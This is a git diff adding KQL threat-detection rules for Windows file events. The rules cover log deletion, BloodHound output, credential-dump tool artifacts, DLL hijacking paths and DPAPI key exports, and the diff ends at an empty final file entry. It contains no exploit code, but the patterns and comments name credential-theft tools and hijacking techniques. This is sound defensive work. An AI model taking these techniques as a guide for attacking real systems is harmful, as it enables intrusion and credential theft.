diff --git a/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql
new file mode 100644
index 00000000..5e684206
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/file_deleted_via_sysinternals_sdelete.kql
@@ -0,0 +1,12 @@
+// Title: File Deleted Via Sysinternals SDelete
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+//   - Legitimate usage
+
+DeviceFileEvents
+| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql b/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql
new file mode 100644
index 00000000..2f46e888
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/iis_webserver_access_logs_deleted.kql
@@ -0,0 +1,13 @@
+// Title: IIS WebServer Access Logs Deleted
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+//   - During uninstallation of the IIS service
+//   - During log rotation
+
+DeviceFileEvents
+| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql b/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql
new file mode 100644
index 00000000..7af11faa
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/powershell_console_history_logs_deleted.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Console History Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
+| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql b/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql
new file mode 100644
index 00000000..4cf0c433
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/prefetch_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: Prefetch File Deleted
+// Author: Cedric MAURUGEON
+// Date: 2021-09-29
+// Level: high
+// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
+| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql b/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql
new file mode 100644
index 00000000..aebbe968
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/teamviewer_log_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: TeamViewer Log File Deleted
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
+| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql b/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql
new file mode 100644
index 00000000..f6845c88
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/tomcat_webserver_logs_deleted.kql
@@ -0,0 +1,13 @@
+// Title: Tomcat WebServer Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-16
+// Level: medium
+// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+// False Positives:
+//   - During uninstallation of the tomcat server
+//   - During log rotation
+
+DeviceFileEvents
+| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql
new file mode 100644
index 00000000..b3f52523
--- /dev/null
+++ b/KQL/rules/windows/file/file_delete/unusual_file_deletion_by_dns_exe.kql
@@ -0,0 +1,10 @@
+// Title: Unusual File Deletion by Dns.exe
+// Author: Tim Rauch (Nextron Systems), Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql
new file mode 100644
index 00000000..c0db6966
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/_rdp_file_created_by_uncommon_application.kql
@@ -0,0 +1,10 @@
+// Title: .RDP File Created By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\olk.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath endswith ".rdp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql b/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
new file mode 100644
index 00000000..3bf1823b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql
@@ -0,0 +1,12 @@
+// Title: ADExplorer Writing Complete AD Snapshot Into .dat File
+// Author: Arnim Rupp (Nextron Systems), Thomas Patzke
+// Date: 2025-07-09
+// Level: medium
+// Description: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+// False Positives:
+//   - Legitimate use of ADExplorer by administrators creating .dat snapshots
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\ADExp.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64a.exe") and FolderPath endswith ".dat"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql
new file mode 100644
index 00000000..e58ae69a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/adsi_cache_file_creation_by_uncommon_tool.kql
@@ -0,0 +1,12 @@
+// Title: ADSI-Cache File Creation By Uncommon Tool
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2019-03-24
+// Level: medium
+// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.t1001.003, attack.command-and-control
+// False Positives:
+//   - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
+
+DeviceFileEvents
+| where (FolderPath contains "\\Local\\Microsoft\\Windows\\SchCache\\" and FolderPath endswith ".sch") and (not((((InitiatingProcessFolderPath endswith ":\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\CCM\\CcmExec.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\dllhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\efsui.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\mmc.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wbem\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe") or (InitiatingProcessFolderPath contains ":\\Windows\\ccmsetup\\autoupgrade\\ccmsetup" or InitiatingProcessFolderPath contains ":\\Program Files\\SentinelOne\\Sentinel Agent")) or ((InitiatingProcessFolderPath contains ":\\Program Files\\" and InitiatingProcessFolderPath contains "\\Microsoft Office") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe" or InitiatingProcessFolderPath endswith "\\LANDesk\\LDCLient\\ldapwhoami.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql b/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql
new file mode 100644
index 00000000..c97e2db0
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/advanced_ip_scanner_file_event.kql
@@ -0,0 +1,12 @@
+// Title: Advanced IP Scanner - File Event
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: medium
+// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1046
+// False Positives:
+//   - Legitimate administrative use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql b/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql
new file mode 100644
index 00000000..251fea5d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/adwind_rat_jrat_file_artifact.kql
@@ -0,0 +1,10 @@
+// Title: Adwind RAT / JRAT File Artifact
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Roaming\\Oracle\\bin\\java" and FolderPath contains ".exe") or (FolderPath contains "\\Retrive" and FolderPath contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql b/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql
new file mode 100644
index 00000000..45ba1b42
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/anydesk_temporary_artefact.kql
@@ -0,0 +1,14 @@
+// Title: Anydesk Temporary Artefact
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\AnyDesk\\user.conf" or FolderPath contains "\\AppData\\Roaming\\AnyDesk\\system.conf"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql
new file mode 100644
index 00000000..45ac03b2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/assembly_dll_creation_via_aspnetcompiler.kql
@@ -0,0 +1,12 @@
+// Title: Assembly DLL Creation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: medium
+// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate assembly compilation using a build provider
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql
new file mode 100644
index 00000000..60d24e33
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql
@@ -0,0 +1,12 @@
+// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith "WsmPty.xsl" or FolderPath endswith "WsmTxt.xsl") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql b/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql
new file mode 100644
index 00000000..d7712fac
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/bloodhound_collection_files.kql
@@ -0,0 +1,12 @@
+// Title: BloodHound Collection Files
+// Author: C.J. May
+// Date: 2022-08-09
+// Level: high
+// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
+// False Positives:
+//   - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
+
+DeviceFileEvents
+| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql b/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql
new file mode 100644
index 00000000..49be841b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/created_files_by_microsoft_sync_center.kql
@@ -0,0 +1,10 @@
+// Title: Created Files by Microsoft Sync Center
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1055, attack.t1218, attack.execution, attack.defense-evasion
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql b/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql
new file mode 100644
index 00000000..a4d787f2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_exe_for_service_with_unquoted_path.kql
@@ -0,0 +1,11 @@
+// Title: Creation Exe for Service with Unquoted Path
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
+// Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql b/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql
new file mode 100644
index 00000000..0e0dd198
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_of_a_diagcab.kql
@@ -0,0 +1,12 @@
+// Title: Creation of a Diagcab
+// Author: frack113
+// Date: 2022-06-08
+// Level: medium
+// Description: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development
+// False Positives:
+//   - Legitimate microsoft diagcab
+
+DeviceFileEvents
+| where FolderPath endswith ".diagcab"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
new file mode 100644
index 00000000..82b26e2b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql
@@ -0,0 +1,12 @@
+// Title: Creation Of Non-Existent System DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
+// Date: 2022-12-01
+// Level: medium
+// Description: Detects creation of specific system DLL files that are  usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.
+// Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.
+// Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath endswith ":\\Windows\\System32\\axeonoffhelper.dll" or FolderPath endswith ":\\Windows\\System32\\cdpsgshims.dll" or FolderPath endswith ":\\Windows\\System32\\oci.dll" or FolderPath endswith ":\\Windows\\System32\\offdmpsvc.dll" or FolderPath endswith ":\\Windows\\System32\\shellchromeapi.dll" or FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
new file mode 100644
index 00000000..783d94c9
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql
@@ -0,0 +1,10 @@
+// Title: Creation of WerFault.exe/Wer.dll in Unusual Folder
+// Author: frack113
+// Date: 2022-05-09
+// Level: medium
+// Description: Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\UUS\\arm64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql
new file mode 100644
index 00000000..5915c1ac
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/cred_dump_tools_dropped_files.kql
@@ -0,0 +1,12 @@
+// Title: Cred Dump Tools Dropped Files
+// Author: Teymur Kheirkhabarov, oscd.community
+// Date: 2019-11-01
+// Level: high
+// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
+// False Positives:
+//   - Legitimate Administrator using tool for password recovery
+
+DeviceFileEvents
+| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql
new file mode 100644
index 00000000..a1b7d6fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/csexec_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: CSExec Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\csexecsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql
new file mode 100644
index 00000000..d4c27717
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql
@@ -0,0 +1,13 @@
+// Title: Desktop.INI Created by Uncommon Process
+// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
+// Date: 2020-03-19
+// Level: medium
+// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+//   - Operations performed through Windows SCCM or equivalent
+//   - Read only access list authority
+
+DeviceFileEvents
+| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not(((InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\" and FolderPath contains "\\JetBrains\\apps\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql
new file mode 100644
index 00000000..262ff091
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/dll_search_order_hijackig_via_additional_space_in_path.kql
@@ -0,0 +1,11 @@
+// Title: DLL Search Order Hijackig Via Additional Space in Path
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-30
+// Level: high
+// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
+// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
new file mode 100644
index 00000000..b8db3552
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/dpapi_backup_keys_and_certificate_export_activity_ioc.kql
@@ -0,0 +1,12 @@
+// Title: DPAPI Backup Keys And Certificate Export Activity IOC
+// Author: Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-26
+// Level: high
+// Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, attack.t1552.004
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "ntds_capi_" or FolderPath contains "ntds_legacy_" or FolderPath contains "ntds_unknown_") and (FolderPath endswith ".cer" or FolderPath endswith ".key" or FolderPath endswith ".pfx" or FolderPath endswith ".pvk")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql
new file mode 100644
index 00000000..fccf31b5
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/drop_binaries_into_spool_drivers_color_folder.kql
@@ -0,0 +1,10 @@
+// Title: Drop Binaries Into Spool Drivers Color Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: medium
+// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql b/KQL/rules/windows/file/file_event/dynamic_csharp_compile_artefact.kql
